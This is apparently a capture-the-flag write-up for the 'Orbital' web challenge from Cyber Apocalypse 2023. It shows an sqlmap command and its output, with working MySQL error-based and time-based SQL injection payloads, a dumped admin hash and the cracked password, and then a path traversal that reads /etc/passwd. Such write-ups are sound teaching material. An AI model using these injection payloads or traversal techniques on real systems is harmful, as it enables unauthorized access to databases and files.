THE
WHITE
CIRCLE

web

Cyber Apocalypse 2023

Orbital

Solved by Legend

Challenge description

In order to decipher the alien communication that held the key to their location, she needed access to a decoder with advanced capabilities - a decoder that only The Orbital firm possessed. Can you get your hands on the decoder?

In this challenge also a login page is their.

And with no user info or details in source code I checked the docker files.

This challenge is similar to the Drobots challenge. It’s running Flask application with MySQL. So I looked into the docker file.

The config.py contains the database config info.

And database.py contain the database logic along with the hint but it is modified a little. This time the password is getting verified with passwordVerify.

I again saved the request and gave it to sqlmap which gave me the token and also bruteforced the password.

sqlmap -r ./req --dbms=mysql -D orbital -T users --dump


---
Parameter: JSON username ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: {"username":"a"="a" AND (SELECT 2720 FROM(SELECT COUNT(*),CONCAT(0x716a7a6271,(SELECT (ELT(2720=2720,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "a"="a","password":"a"}

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"username":"a"="a" AND (SELECT 1000 FROM (SELECT(SLEEP(5)))dfxy) AND "a"="a","password":"a"}
---


+----+-------------------------------------------------+----------+
| id | password                                        | username |
+----+-------------------------------------------------+----------+
| 1  | 1692b753c031f2905b89e7258dbc49bb (ichliebedich) | admin    |
+----+-------------------------------------------------+----------+

Now once logged in the functionality of the website was different.

Now I checked the routes.py file which contained a logic of the application. Here in the logic of communication the hint was given that the file escape for characters are not there for the filename.

Then I tried the path traversal to get the /etc/passwd file. It worked.

For this challenge they changed the location of the flag name from flag.txt to signal_sleuth_firmware in root which is written in the docker config.

COPY flag.txt /signal_sleuth_firmware

Now we need to get the flag.

Published on : 27 Mar 2023